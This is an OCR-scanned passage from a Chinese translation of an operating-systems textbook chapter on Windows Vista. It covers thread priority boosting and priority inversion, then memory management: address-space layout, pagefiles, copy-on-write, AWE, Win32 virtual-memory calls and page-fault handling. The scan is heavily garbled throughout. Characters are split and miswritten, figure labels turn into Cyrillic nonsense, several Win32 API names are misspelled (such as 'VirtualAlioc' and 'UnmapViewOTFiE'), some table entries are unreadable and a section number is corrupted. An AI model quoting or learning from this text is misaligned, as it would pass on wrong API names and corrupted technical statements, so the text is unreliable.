输入 就 绪 使 得 图 形 用 户 接口 线程 被 唤醒 ， 它 的 优先 级 同样 会 得 到 大 幅 提升 。 

提升 不 是 永远 的 。 优 先 级 的 提升 是 立刻 发 生 作用 的 ， 并 且 会 引起 处 理 器 的 再 次 调度 。 但 是 如 果 一 
个 线程 用 完 它 的 时 间 分 配 量 ， 它 就 会 降低 一 个 优先 级 而 且 排 在 新 优先 级 队列 的 队 尾 。 如 果 它 两 次 用 完 一 
个 完整 的 时 间 配 额 , 它 就 会 再 降 一 个 优先 级 ， 如 此 下 去 直到 降 到 它 的 基本 优先 级 ， 在 基本 优先 级 得 到 保持 
不 会 再 降 ， 直 到 它 的 优先 级 再 次 得 到 提升 。 

还 有 一 种 情况 就 是 系统 变动 (fiddle) 优先 级 。 假设 有 二 个 线程 正在 一 个 生产 者 -消费 者 类 型 问题 
上 一 起 协同 工作 。 生 产 者 的 工作 需要 更 多 的 资源 ， 因 此 ， 它 得 到 高 的 优先 级 ， 例 如 说 12， 而 消费 者 得 到 
的 优先 级 为 4。 在 特定 的 时 刻 ， 生 产 者 已 经 把 共享 的 缓冲 区 填 满 ,信号 车 发 生 阻 塞 ， 如 图 11-29a 所 示 。 


在 信号 最 上 执行 down 阻塞 (12 
ВНЕ, Аж 存 信号 量 上 等 待 
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《在 信号 量 上 执行 
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а) b) 
图 11-29 优先 级 转 置 的 示例 


如 图 11-29b 所 示 ， 在 消费 者 得 到 调度 再 次 运行 之 前 ， 一 个 无 关 的 线程 在 优先 级 8 已 就 绪 得 到 调度 运 
行 。 只 要 这 个 线程 想 要 运行 , 它 将 会 一 直 运 行 ， 因 为 这 个 线程 的 优先 级 高 于 消费 者 的 优先 级 ， 而 比 它 优 
先 级 高 的 生产 者 由 于 阻塞 也 不 能 够 运行 。 在 这 种 情况 下 ， 直 到 优先 级 为 8 的 线程 运行 完毕 ， 生 产 者 才 有 
机 会 再 次 运行 。 

Windows 通 过 一 个 称 为 大 hack 来 解决 此 类 问题 的 。 系 统 记录 一 个 已 就 绪 的 线程 自从 上 次 得 到 运行 后 
距离 当前 的 时 间 有 多 久 。 如 果 它 超过 一 个 特定 的 阔 值 ， 它 就 被 提升 到 15 级 的 优先 级 并 得 到 两 个 时 间 配 额 
的 运转 。 这 就 可 能 解决 生产 者 阻 寨 的 情况 。 在 两 个 时 间 配 额 用 完 之 后 ， 它 的 优先 级 一 下 子 又 回 到 原来 的 
优先 级 而 不 是 逐 级 别 地 缓慢 下 降 到 原来 的 优先 级 。 或 许 较 好 的 解决 方法 是 把 那些 用 完 时 间 配 额 的 线程 的 
优先 级 不 断 地 降低 。 毕 竞 ， 问 题 不 是 由 饥 馈 的 线程 所 引起 的 ， 而 是 由 贫 禁 线程 造成 的 。 这 一 问题 广 为 人 
知 地 称 作 优先 级 倒转 (priority inversion), 

在 优先 为 16 条 线程 获得 互 斥 量 却 长 时 间 得 不 到 调度 的 时 候 会 发 生 一 个 类 似 的 问题 ， 致 使 更 重要 的 系 
统 线程 由 于 等 待 互 尺 量 而 不 能 运行 发 生 饥 饿 。 这 一 问题 在 操作 系统 里 通过 在 那些 只 需要 短 时 间 拥 有 互 斥 
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量 的 线程 在 很 忙 时 禁用 调度 来 解决 。( 在 一 个 多 处 理 器 上 ， 一 个 Spin 锁 应 被 使 用 。) 

在 离开 调度 的 主题 之 前 ， 关 于 时 间 配 额 值得 再 讨论 一 下 。 在 Windows 客 户 端 系统 上 ， 默 认 值 是 20 
毫秒 。 在 Windows 服 务 器 系统 上 ， 它 是 180 毫 秒 。 短 的 时 间 配 额 在 交互 性 上 会 更 好 些 ， 然 而 长 的 时 间 配 
额 能 减少 切换 提高 效率 。 如 果 需 要 ， 了 时 间 配 额 可 以 手动 地 设置 成 默认 值 的 2 倍 、4 倍 或 6 倍 。 

最 后 对 调度 算法 来 说 ， 当 新 窗口 变 成 前 台 窗 口 的 时 候 ， 它 的 全 部 在 窗口 中 注册 的 线程 都 会 得 到 一 个 
较 长 的 时 间 配 额 。 这 一 个 变化 给 它们 较 多 的 处 理 器 时 间 ， 从 而 为 这 些 窗口 刚刚 转移 到 前 台 的 应 用 程序 带 
来 了 更 好 的 用 户 体验 。 


11.5 内 存 管理 

Windows Vista 有 一 个 极端 复杂 的 虚拟 内 存 系统 。 这 一 系统 包括 了 大 量 Win32 函 数 ， 这 些 函数 通过 内 
存 管理 器 (NTOS 执 行 层 最 大 的 组 件 ) 来 实现 。 在 下 面 章节 中 ， 我们 将 依次 了 解 它 的 基本 概念 、Win32 
的 API 调 用 以 及 它 的 实现 。 
11.5.1 基本 概念 

在 Windows Vista 系 统 中 ， 每 个 用 户 进程 都 有 它 自己 的 虚拟 地 址 空间 。 对 于 x86 机 器 ， 虚 拟 地 址 是 32 
位 的 ， 因 此， 每 个 进程 拥有 4GB 大 小 的 虚拟 地 址 空间 。 其 中 用 户 态 进程 的 虚拟 地 址 大 小 为 2GB (在 服务 
器 系统 中 ， 用 户 态 进程 的 虚拟 地 址 大 小 可 以 配置 成 3GB)。 另 外 的 2GB (RIGB) 空间 为 内 核 进程 所 用 。 
对 于 运行 在 64 位 上 的 x64 机 器 而 言 ， 地 址 可 以 是 32 位 的 也 可 以 是 64 位 的 。 32 位 地 址 是 为 了 应 用 那些 “ 需 
要 通过 WOW64 来 运行 在 64 位 系统 上 的 32 位 进程 ”而 保留 的 。 由 于 内 核 拥有 大 量 可 用 的 地 址 空间 ， 如 果 
需要 的 话 ，32 位 进程 可 以 使 用 全 部 4GB 大 小 的 地 址 空间 。 对 于 x86 和 x64 机 器 ， 虚 拟 地 址 空间 需要 分 页 ， 
并 且 页 的 大 小 一 般 都 是 固定 在 4KB 一 一 虽然 在 有 些 情况 下 每 页 的 大 小 也 可 被 分 为 4MB (通过 只 使 用 页 目 
录 而 忽略 掉 页 表 ) 。 

图 11-30 表 示 了 三 个 x86 进 程 的 虚拟 地 址 空间 。 每 个 进程 的 底部 和 顶端 64KB 的 虚拟 地 址 空间 通常 保 
留 不 用 。 这 种 做 法 是 为 了 辅助 发 现 程序 错误 而 设置 的 。 无 效 的 指针 通常 标志 为 0 或 者 -1， 使 用 这 样 的 指 
针 会 导致 立即 陷入 中 断 ， 而 不 会 读 取 垃圾 信息 、 甚 至 写 入 错误 的 内 存 地 址 。 
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图 11-30 x86 三 个 用 户 进程 的 虚拟 地 址 空间 。 白 色 的 区 域 为 
每 个 进程 私有 的 。 阴 影 的 区 域 为 所 有 的 进程 共享 
从 64KB 开 始 为 用 户 私有 的 代码 和 数据 。 这 些 空间 可 以 扩充 到 几乎 2 个 GB。 而 最 顶端 的 2GB 包 含 了 操 
作 系统 部 分 ， 包 括 代码 、 数 据 、 换 页 内 存 池 和 非 换 页 内 存 池 。 除 了 每 一 进程 的 虚拟 内 存 数据 ( 像 页 表 和 
工作 集 的 列表 ) ， 上 面 的 2GB 全 部 作为 内 核 的 虚拟 内 存 、 并 在 所 有 的 用 户 进程 之 中 共享 。 内 核 虚 拟 内 存 仅 
在 内 核 态 才 可 以 访问 。 共 享 进程 在 内 核 部 分 的 虚拟 内 存 的 原因 是 ， 当 一 个 线程 进行 系统 调用 的 时 候 ， 它 
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陷入 内 核 态 之 后 不 需要 改变 内 存 映射 。 所 有 要 做 的 只 是 切换 到 线程 的 内 核 栈 。 由 于 进程 在 用 户 态 下 的 页 
面 仍然 是 可 访问 的 ， 内 核 态 下 的 代码 在 读 取 参 数 和 访问 缓冲 时 ， 就 不 用 在 地 址 空间 之 间 来 回 切换 、 或 者 
临时 将 页 面 进行 两 次 映射 。 这 里 的 权衡 是 通过 用 较 小 的 进程 私有 地 址 空间 ， 来 换取 更 快 的 系统 调用 。 

当 运行 在 内 核 态 的 时 候 ，Windows 允 许 线程 访问 其 余 的 地 址 空间 。 这 样 该 线程 就 可 以 访问 所 有 用 
户 态 的 地 址 空间 ， 以 及 对 该 进程 来 说 通常 不 可 访问 的 内 核 地 址 空间 中 的 区 域 ， 例 如 页 表 的 自 映射 区 域 。 
在 线程 切换 到 用 户 态 之 前 ， 必 须 切 换 到 它 最 初 的 地 址 空间 。 

1. 虚拟 地 址 分 配 

虚拟 地 址 的 每 页 处 于 三 种 状态 之 一 : EA. RARE AAAG (invalid page) 是 指 一 个 页 面 没 
有 被 映射 到 一 个 内 存 区 对 象 section object), ， 对 它 的 访问 会 引发 一 个 相应 的 页 面 失效 。 一 旦 代码 或 数据 
被 映射 到 虚拟 页 面 ， 就 说 一 个 页 面 处 于 提交 (committed) 状态 。 在 提交 的 页 上 发 生 页 面 失效 会 导致 如 下 
情况 : 将 一 个 包含 了 引起 失效 的 虚拟 地 址 的 页 面 映射 到 这 样 的 页 面 一 由 内 存 区 对 象 所 表示 ， 或 被 保存 
于 页 面 文件 之 中 。 这 种 情况 通常 发 生 在 需要 分 配 物理 页 面 ， 以 及 对 内 存 区 对 象 所 表示 的 文件 进行 WO 来 从 
硬盘 读 取 数 据 的 时 候 。 但 是 页 面 失 效 的 发 生 也 可 能 是 页 表 正 在 更 新 而 造成 的 ， 即 物理 页 面 仍 在 内 存 的 高 
速 缓存 中 ， 这 种 情况 下 不 需要 进行 LO。 这 些 叫 做 软 异 常 (soft fault) ， 稍 后 我 们 会 更 详细 地 讨论 它们 。 

虚拟 页 面 还 可 以 处 于 保留 的 (reserved) 状态 。 保 留 的 虚拟 页 是 无 效 的 ， 但 是 这 些 页 面 不 能 被 内 存 
管理 器 用 于 其 他 目的 而 分 配 。 例 如 ， 当 创建 一 个 新 线程 时 ， 用 户 态 栈 空 间 的 许多 页 保留 于 进程 的 虚拟 地 
址 空间 ， 仅 有 一 个 页 面 是 提交 的 。 当 栈 增长 时 ， 虚 拟 内 存 管理 器 会 自动 提交 额外 的 页 面 ， 直 到 保留 页 面 
耗 尽 。 保 留 页 面 的 功效 是 ， 可 以 保证 栈 不 会 太 长 而 覆盖 其 他 进程 的 数据 。 保 留 所 有 的 虚拟 页 意味 着 术 最 
终 可 以 达到 它 的 最 大 尽 寸 ， 而 栈 所 需要 的 连续 虚拟 地 址 空间 的 页 面 ， 也 不 会 有 用 于 其 他 用 途 的 风险 。 除 
了 无 效 、 保 留 、 提 交 状 态 ， 页 面 还 有 其 他 的 属性 : 可 读 、 可 写 及 可 运行 (在 AMD64 兼 容 的 处 理 器 下 ) 。 

2. 页 面 文件 

关于 后 备 存储 器 的 分 配 有 一 个 有 趣 的 权衡 ， 已 提交 页 面 没有 被 映射 于 特定 文件 。 这 些 页 使 用 了 页 面 
文件 (pagefile) 。 问 题 是 该 如 何以 及 何 时 把 虚拟 页 映射 到 页 面 文件 的 特定 位 置 。 一 个 简单 的 策略 是 ， 当 
一 个 页 被 提交 时 ， 为 虚拟 页 分 配 一 个 硬盘 上 页 面 文件 中 的 页 。 这 会 确保 对 于 每 一 个 有 必要 换 出 内 存 的 已 
提交 页 ， 都 有 一 个 确定 的 位 置 写 回去 。 

Windows 使 用 一 个 适时 (just-in-time) 策略 。 直 到 需要 被 换 出 内 存 之 前 ， 在 页 面 文件 中 的 具体 空间 
不 会 分 配给 已 提交 的 页 面 。 硬 盘 空 间 当然 不 需要 分 配给 永远 不 换 出 的 页 面 。 如 果 总 的 虚拟 内 存 比 可 用 的 
物理 内 存 少 ， 则 根本 不 需要 页 面 文件 。 这 对 基于 Windows 的 伐 入 式 系统 是 很 方便 的 。 这 也 是 系统 启动 时 
的 方式 ， 因 为 页 面 文件 是 在 第 一 个 用 户 态 进程 smss ,exe 启动 之 后 才 初 始 化 的 。 

在 预 分 配 策略 下 ， 用 于 私有 数据 (如 校 、 写 时 复制 代码 页 ) 的 全 部 虚拟 内 存 受到 页 面 文件 大 小 的 限 
制 。 通 过 适时 分 配 的 策略 ， 总 的 虚拟 内 存 大 小 是 物理 内 存 和 页 面 文件 大 小 的 总 和 。 既 然 相对 物理 内 存 来 
说 硬盘 足够 大 与 便宜 ， 提 升 性 能 的 需求 自然 比 空间 的 节省 更 重要 。 

有 关 请 求 调 页 , 需要 马上 进行 初始 化 从 硬盘 读 取 页 的 请 求 一 因为 在 页 人 (page-in) 操作 完成 之 前 
过 到 页 面 失 效 的 线程 无 法 继续 运行 下 去 。 对 于 失效 页 面 的 一 个 可 能 的 优化 是 ， 在 进行 一 次 1/O 操 作 时 预 
调 入 一 些 额外 的 页 面 。 然而 ， 对 于 修改 过 的 页 写 同 磁盘 和 线程 的 执行 一 般 并 不 是 同步 的 。 对 于 分 配 页 面 
文件 空间 的 适时 策略 便 是 利用 这 一 点 ， 在 将 修改 过 的 页 面 写 人 页 面 文件 时 提升 性 能 ， 修 改过 的 页 面 被 集 
中 到 一 起 ， 统 一 进行 写 人 操作 。 由 于 只 有 当 页 面 被 写 回 时 页 面 文件 的 空间 才 真正 被 分 配 ， 可 以 通过 排列 
使 页 面 文件 中 的 页 面 较为 接近 甚至 连续 ， 来 对 大 批 写 回 页 面 时 的 寻找 次 数 进行 优化 。 

当 存储 在 页 面 文件 中 的 页 被 读 取 到 内 存 中 时 ， 直 到 它们 第 一 次 被 修改 之 前 ， 这 些 页 面 -- 直 保持 它们 
在 页 面 文件 中 的 位 置 。 如 果 一 个 页 面 从 没 被 修改 过 ， 它 将 会 进入 到 一 个 空闲 物理 页 面 的 列表 中 去 一 一 这 
个 表 称 作 后 备 链表 【standby list) ， 这 个 表 中 的 页 面 可 以 不 用 写 回 硬 航 而 再 次 被 使 用 。 如 果 它 被 修改 ， 内 
存 管理 器 将 会 释放 页 面 文件 中 的 页 ， 并 且 内 存 将 保留 这 个 页 的 惟一 副本 。 这 是 内 存 管理 器 通过 把 一 个 加 
载 后 的 页 标识 为 只 读 来 实现 的 。 线 程 第 一 次 试图 写 一 个 页 时 ， 内 存 管理 器 检测 到 它 所 处 的 情况 并 释放 页 
面 文件 中 的 页 ， 再 授权 写 操作 给 相应 的 页 ， 之 后 让 线程 再 次 进行 尝试 。 

Windows 支 持 多 达 16 个 页 面 文件 ， 通 常 覆 盖 到 不 同 的 磁盘 来 达到 较 高 的 IO 带宽 。 每 一 个 页 面 文件 
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都 有 初始 的 大 小 和 随后 依 需 要 可 以 增长 到 的 最 大 空间 ， 但 是 在 系统 安装 时 就 创建 这 些 文件 达到 它 的 最 大 
值 是 最 好 的 。 如 果 当 文件 系统 非常 满 却 需要 增长 页 面 文件 时 ， 页 面 文件 的 新 空间 可 能 会 由 多 个 秦 片 所 组 
成 ， 这 会 降低 系统 的 性 能 。 

操作 系统 通过 为 进程 的 私有 页 写 人 映射 信息 到 页 表 人 口 ， 或 与 原 页 表 和 口 相对 应 的 共享 页 的 内 存 区 
对 象 ， 来 跟踪 虚拟 页 与 页 面 文件 的 映射 关系 。 除 了 被 页 面 文件 保留 的 页 面 外 ， 进 程 中 的 许多 页 面 也 被 映 
射 到 文件 系统 中 的 普通 文件 。 

程序 文件 中 的 可 执行 代码 和 只 读数 据 (例如 EXE 或 DLL) 可 以 映射 到 任何 进程 正在 使 用 的 地 址 空间 。 
因为 这 些 页 面 无 法 被 修改 ， 它 们 从 来 不 需要 换 出 内 存 ， 然 而 在 页 表 映 射 全 部 被 标记 为 无 效 后 ， 可 以 立即 
重用 物理 页 面 。 当 一 个 页 面 在 今后 青 次 需要 时 ， 内 存 管理 器 将 从 程序 文件 中 将 其 读 入 。 

有 时 候 页 面 开 始 时 为 只 读 但 最 终 被 修改 。 例 如 ， 当 调试 进程 时 在 代码 中 设 定 中 断 点 ， 或 将 代码 重 定 
向 为 进程 中 不 同 的 地 址 ， 或 对 于 开始 时 为 共享 的 数据 页 面 进行 修改 。 在 这 些 情况 下 ， 像 大 多 数 现代 操作 
系统 一 样 ，Windows 支 持 写 时 复制 (copy-on-write) 类 型 的 页 面 。 这 些 页 面 开始 时 像 普通 的 被 映射 页 面 
一 样 ， 但 如 果 试 图 修改 任何 部 分 页 面 ， 内 存 管理 器 将 会 建立 一 份 私有 的 、 可 写 的 副本 。 然 后 它 更 新 虚拟 
页 面 的 页 表 ， 使 之 指向 那个 私有 副本 ， 并 且 使 线程 重新 进行 写 操作 一 -这 一 次 将 会 成 功 。 如 果 这 个 副本 
之 后 需要 被 换 出 内 存 ， 那 么 它 将 被 写 回 到 页 面 文件 而 不 是 原始 文件 中 。 

除了 从 EXE 和 DLL 文件 映射 程序 代码 和 数据 ， 一 般 的 文件 都 可 以 映射 到 内 存 中 ， 使 得 程序 不 需要 进 
行 显 式 的 读 写 操作 就 可 以 从 文件 引用 数据 。1/O 操 作 仍 然 是 必要 的 ， 但 它们 由 内 存 管理 器 通过 使 用 内 存 
区 对 象 隐 式 提供 ， 来 表示 内 存 中 的 页 面 和 磁盘 中 的 文件 块 的 映射 。 

内 存 区 对 象 并 不 一 定 和 文件 相关 。 它 们 可 以 和 匿名 内 存 区 域 相关 。 通 过 映射 匿名 内 存 区 对 象 到 多 个 
进程 ， 内 存 可 以 在 不 分 配 磁盘 文件 的 前 提 下 共享 。 既然 内 存 区 可 以 在 NT 名 字 空 间 给 予 名 字 ， 进 程 可 以 
通过 用 名 字 打 开 内 存 区 对 象 、 或 者 复制 进程 间 的 内 存 区 对 象 句柄 的 方式 来 进行 通信 。 

3. 大 物理 内 存 寻 址 

多 年 前 ， 当 16 位 (或 20 位 ) 的 地 址 空间 还 作为 标准 的 时 候 ， 机 器 已 有 兆 字 节 的 物理 内 存 ， 人 们 努力 
想 出 各 种 技术 使 得 程序 可 以 使 用 更 多 的 物理 内 存 、 而 不 是 去 适应 有 限 的 地 址 空间 。 这 些 技术 通常 基于 存 
BMH (bank switching)， 使 得 一 个 程序 可 以 突破 16 或 者 20 位 的 限制 ， 赫 换 掉 自 己 的 一 些 内存 块 。 
在 刚 引 入 32 位 计算 机 时 ， 大 多 数 桌 面 计算 机 只 有 几 个 兆 的 物理 内 存 。 然 而 随 着 内 存在 集成 电路 上 变 得 更 
加 密集 ， 可 用 内 存 开始 迅速 增长 。 这 推动 了 服务 器 的 发 展 ， 因 为 服务 器 上 的 应 用 程序 往往 需要 更 多 的 内 
存 。 英 特 尔 的 Xeon 芯 片 支持 物理 地 址 扩展 (PAE)， 物 理 内 存 寻 址 空间 从 32 位 变 为 36 位 ， 意 味 着 一 个 单 
一 的 系统 可 以 支持 高 达 64GB 的 物理 内 存 。 这 远 远大 于 2G 或 者 3G 一 一 单个 进程 可 以 在 32 位 的 用 户 模式 寻 
址 的 虚拟 地 址 空间 ， 然 而 一 些 像 SQL 数 据 库 这 样 的 大 型 应 用 软件 恰恰 被 设计 为 运行 在 一 个 单个 进程 的 于 
址 空间 中 ， 因 此 存储 器 组 转换 已 经 过 时 了 ， 取 代 它 的 是 地 址 窗口 扩展 (Address Windowing Extensions, 
AWE)。 这 种 机 制 允许 程序 (以 正确 的 特权 级 运行 ) 去 请 求 物 理 内 存 的 分 配 。 进 程 可 以 保留 所 需 的 虚拟 
地 址 ， 并 请 求 操作 系统 进行 虚拟 地 址 与 物理 地 址 间 的 映射 。 在 所 有 的 服务 器 应 用 64 位 寻 址 方式 前 ，AWE 
一 直 充 当权 宜 之 计 的 角色 。 

1.52 内 存 管理 系统 调用 

Win32 АРІ 包含 了 大 量 的 函数 来 支持 一 个 进程 显 式 地 管理 它 自己 的 虚拟 内 存 ， 其 中 最 重要 的 函数 如 
图 11-31 所 示 。 它 们 都 是 在 包含 一 个 单独 的 页 或 一 个 由 两 个 或 多 个 在 虚拟 地 址 空间 中 连续 页 的 序列 的 区 
域 上 进行 操作 的 。 

前 四 个 API 函 数 是 用 来 分 配 ， 释 放 、 保 护 和 查询 虚拟 地 址 空间 中 的 区 域 的 。 被 分 配 的 区 域 总 是 从 
64KB 的 边界 开始 ， 以 尽 基 减少 移植 到 将 来 的 体系 结构 的 问题 (因为 将 来 的 体系 结构 可 能 使 用 比 当前 使 
用 的 页 更 大 的 页 )。 实 际 分 配 的 地 址 空间 可 以 小 于 64KB， 但 是 必须 是 一 个 页 大 小 的 整数 倍 。 接 下 来 的 两 
个 API 给 一 个 进程 把 页 面 固定 到 内 存 中 以 防止 它们 被 替换 到 外 存 以 及 撤销 这 一 性 质 的 功能 。 举例 来 说 ， 
一 个 实时 程序 可 能 需要 它 的 页 面具 有 这 样 的 性 质 以 防止 在 关键 操作 上 发 生 页 面 失 效 。 操 作 系统 强加 了 一 
个 限制 来 防止 一 个 进程 过 于 “ 俩 禁 "， 这 些 页 面 能 够 移出 内 存 ， 但 是 仅仅 在 整个 进程 被 赫 换 出 内 存 的 时 
候 才 能 这 么 做 。 当 该 进程 被 重新 装 入 内 存 时 ， 所 有 之 前 被 指定 固定 到 内 存 中 的 页 面 会 在 任何 线程 开始 运 
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行 之 前 被 重新 装 入 内 存 。 尽 管 没有 从 图 11-31 中 体现 出 来 ，Windows Vista 还 包含 一 些 原生 API 函 数 来 允许 
一 个 进程 访问 其 他 进程 的 虚拟 内 存 。 前 提 是 该 进程 被 给 予 了 控制 权 ， 即 它 拥有 一 个 相应 的 句 栖 。 


Win32 API 函数 ж ж 

VirtualAlioc 保留 或 提交 一 个 区 域 

VirtualFree FARR MER 

VirtualProtect 改变 在 一 不 区 域 上 的 读 / 写 /执行 保护 

VirtualQuery 查询 一 个 区 域 的 状态 

VirtualLock ЗЕЕ ОИСЕ РА А) 
VirtualUniock ВЕЕ СЕ НА AN 
CreateFileMapping 创建 一 个 文件 映射 对 象 并 且 可 以 过 择 是 否 赋予 该 对 象 一 个 名 于 
MapViewOfFile 映射 一 个 文件 《或 一 个 文件 的 一 个 部 分 ) 到 地 址 空间 中 
UnmapViewOTFiE 从 地 址 空间 中 晋 队 一 个 被 映射 的 文件 
OpenFiieMapping 打开 一 个 之 前 创建 的 文件 映射 对 依 


图 11-31 Windows 中 用 来 管理 虚拟 内 存 的 主要 的 Win32 API 函 数 


列 出 的 最 后 四 个 API 函 数 是 用 来 管理 内 存 映 射 文件 的 。 为 了 映射 一 个 文件 ,首先 必 须 通过 调用 
CreateFileMapping 来 创建 一 个 文件 映射 对 象 ( 见 图 11-23)。 这 个 函数 返回 一 个 文件 映射 对 象 ( 即 一 个 
内 存 区 对 象 ) 的 句柄 ， 并 且 可 以 选择 是 否 为 该 操作 添加 一 个 名 字 到 Win32 地 址 空间 中 ， 从 而 其 他 的 进程 
也 能 够 使 用 它 。 接 下 来 的 两 个 函数 从 一 个 进程 的 虚拟 地 址 空间 中 映射 或 取消 映射 内 存 区 对 象 之 上 的 视图 。 
最 后 一 个 API 能 被 一 个 进程 用 来 映射 其 他 进程 通过 调用 CreateFileMapping 创 建 并 共享 出 来 的 映射 ， 这 
样 的 映射 通常 是 为 了 映射 匿名 内 存 而 建立 的 。 通 过 这 样 的 方式 ， 两 个 或 多 个 进程 能 够 共享 它们 地 址 空间 
中 的 区 域 。 这 一 技术 允许 它们 写 内 容 到 相互 的 虚拟 内 存 的 受 限 的 区 域 中 。 


11.5.3 存储 管理 的 实现 

运行 在 x86 处 理 器 上 的 Windows Vista 操 作 系统 为 每 个 进程 都 单独 提供 了 一 个 4GB 大 小 的 按 需 分 页 
(demand-paged) 的 线性 地 址 空间 ， 不 支持 任何 形式 的 分 段 。 从 理论 上 说 ， 页 面 的 大 小 可 以 是 不 超过 
64KB 的 2 的 任何 次 短 。 但 是 在 Pentium 处 理 器 上， 页 面 正常 情况 下 固定 地 设置 成 4XB 大 小 。 另 外 ， 操 作 系 
统 可 以 使 用 4MB 的 页 来 改进 处 理 器 存储 管理 单元 中 的 快 角 (Translation Lookaside Buffer, TLB) 的 效率 。 
内 核 以 及 大 型 应 用 程序 使 用 了 4MB 大 小 的 页 面 以 后 ， 可 以 显著 地 提高 性 能 。 这 是 因为 快 表 的 命中 率 提高 
了 ， 并 且 访问 页 表 以 寻找 在 快 表 中 没有 找到 的 表 项 的 次 数 减少 了 。 

调度 器 选择 单个 线程 来 运行 而 不 太 关心 进程 ， 存 储 管理 器 则 不 同 ， 它 完全 是 在 处 理 进程 而 不 太 关心 
线程 。 毕 竟 ， 是 进程 而 非 线程 拥有 地 址 空间 ， 而 地 址 空间 正 是 存储 管理 器 所 关心 的 。 当 虚拟 地 址 空间 中 
的 一 片区 域 被 分 配 之 后 ， 就 像 图 11-32 中 进程 A 被 分 配 了 4 片区 域 那样 ， 存 储 管理 器 会 为 它 创 建 一 个 虚拟 地 
HERRN (Virtual Address Descriptor，VAD)。VAD 列 出 了 被 映射 地 址 的 范围 ， 用 来 表示 作为 后 备 存储 的 
文件 以 及 文件 被 映射 区 域 起 始 位 置 的 节 区 以 及 权限 。 当 访问 第 一 个 页 面 的 时 候 ， 创 建 一 个 页 目录 并 且 把 
它 的 物理 地 址 插入 进程 对 象 中 。 一 个 地 址 空间 被 一 个 VAD 的 列表 所 完全 定义 。 VAD 被 组 织 成 平衡 树 的 形 
式 ， 从 而 保证 一 个 特定 地 址 的 描述 符 能 够 被 快速 地 找到 。 这 个 方案 支持 稀疏 的 地 址 空间 。 被 映射 的 区 域 
之 间 未 使 用 的 地 址 空间 不 会 使 用 任何 内 存 中 或 磁盘 上 的 资源 ， 从 这 个 意义 上 说 ， 它 们 是 “免费 ”的 。 

1. 页面 失效 处 理 

当 在 Windows Vista 上 启动 一 个 进程 的 时 候 ， 很 多 映射 了 程序 的 EXE 和 DLL 映像 文件 的 页 面 可 能 已 
经 在 内 存 中 ,这 是 因为 它们 可 能 被 其 他 进程 共享 。 映像 中 的 可 写 页 面 被 标记 成 写 时 复制 (copy-on-write) , 
使 得 它们 能 一 直 被 共享 ， 直 到 内 容 要 被 修改 的 那 一 刻 。 如 果 操 作 系统 从 一 次 过 去 的 执行 中 认 出 了 这 个 
EXE， 它 可 能 已 经 通过 使 用 微软 称 之 为 超级 预 读 取 (SuperFetch) 的 技术 记录 了 页 面 引用 的 模式 。 超级 
预 读 取 技术 尝试 预 先 读 人 很 多 需要 的 页 面 到 内 存 中 ， 尽 管 进程 尚未 在 这 些 页 面 上 发 生 页 面 失效 。 这 一 技 
术 通过 重 礁 从 磁盘 上 读 和 页面 和 执行 映像 中 的 初始 化 代码 ， 减 小 了 启动 应 用 程序 所 需 的 延 时 。 同 时 ， 它 
改进 了 磁盘 的 吞吐 量 ， 因 为 使 用 了 超级 预 读 取 技术 以 后 ， 磁盘 驱动 器 能 够 更 轻易 地 组 织 对 磁盘 的 读 请 求 
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来 减少 所 需 的 寻 道 时 间 。 进 程 预 约 式 页 面 调度 (prepaging) 技术 也 用 到 了 系统 启动 、 把 后 台 应 用 程序 移 
到 前 台 以 及 休眠 之 后 重启 系统 当中 。 


磁盘 上 的 后 备 存储 


进程 A 


peT 
区 域 | 


progl.exe prog2.exe 
图 11-32 被 映射 的 区 域 以 及 它们 在 磁盘 上 的 “影子 ”页 面 。lib.dll 文件 被 同时 映射 到 两 个 地 址 空间 中 


存储 管理 器 支持 预约 式 页 面 调度 ， 但 是 它 被 实现 成 系统 中 一 个 单独 的 组 件 。 被 读 入 到 内 存 的 页 面 不 是 
插入 到 进程 的 页 表 中 ， 而 是 插入 到 后 备 列表 中 ， 从 而 使 得 在 需要 时 可 以 不 访问 磁盘 就 将 它们 插入 到 进程 中 。 

未 被 映射 的 页 面 稍微 有 些 不 同 。 它 们 没有 被 通过 读 取 文件 来 初始 化 。 相 反 ， 一 个 未 被 映射 的 页 面 第 
一 次 被 访问 的 时 候 ， 存 储 管理 器 会 提供 一 个 新 的 物理 页 面 ， 该 页 面 的 内 容 被 事先 清 零 (为 了 安全 方面 的 
原因 )。 在 后 续 的 页 面 失效 处 理 过 程 中 ， 未 被 映射 的 页 面 可 能 会 被 从 内 存 中 找到 ， 否 则 的 话 ， 它 们 必须 
被 从 页 面 文件 中 重新 读 人 内 存 。 

存储 管理 器 中 的 按 需 分 页 是 通过 页 面 失效 来 驱动 的 。 在 每 次 页 面 失效 发 生 的 时 候 ， 会 发 生 一 次 到 内 
核 的 陷入 。 内 核 将 建立 一 个 说 明 发 生 了 什么 事情 的 机 器 无 关 的 描述 符 ， 并 把 该 描述 符 传递 给 存储 管理 器 
相关 的 执行 部 件 。 存 储 管理 器 接 下 来 会 检查 引发 页 面 失 效 的 内 存 访 问 的 有 效 性 。 如 果 发 生 页 面 失 效 的 页 
面 位 于 一 个 已 提交 的 区 域内 ， 存 储 管理 器 将 在 VAD 列 表 中 查找 页 面 地 址 并 找到 (或 创建 ) 进程 页 表 项 。 
对 于 共享 页 面 的 情况 ， 存 储 管理 器 使 用 与 内 存 区 对 象 关联 的 原始 页 表 项 来 填写 进程 页 表 中 的 新 页 表 项 。 

不 同 处 理 器 体系 结构 下 的 页 表 项 的 格式 可 能 会 不 同 。 对 于 x86 和 x64， 一 个 被 映射 页 面 的 页 表 项 如 图 
11-33 所 示 。 如 果 一 个 页 表 项 被 标记 为 有 效 ， 它 的 内 容 会 被 硬件 读 取 并 解释 ， 从 而 虚拟 地 址 能 够 转换 成 
正确 的 物理 地 址 。 未 被 映射 的 页 面 也 有 对 应 的 页 表 项 ， 但 是 这 些 页 表 项 被 标记 成 无 效 ， 硬 件 将 忽略 这 些 
页 表 项 除 该 标记 之 外 的 部 分 。 页 表 项 的 软件 格式 与 硬件 格式 有 所 不 同 ， 软 件 格式 由 存储 管理 器 决定 。 例 
如 ， 对 于 一 个 未 映射 的 页 面 ， 它 必须 在 使 用 前 分 配 和 清 零 ， 这 一 点 可 以 通过 页 表 项 来 表明 。 

页 表 项 中 有 两 个 重要 的 位 是 直接 由 硬件 更 新 的 ， 它 们 是 访问 位 (access bit) 和 脏 位 (dirty bit), iX 
两 个 位 跟踪 了 什么 时 候 一 个 特定 的 页 面 映射 用 来 访问 该 页 面 以 及 这 个 访问 是 否 以 写 的 方式 修改 了 页 面 的 
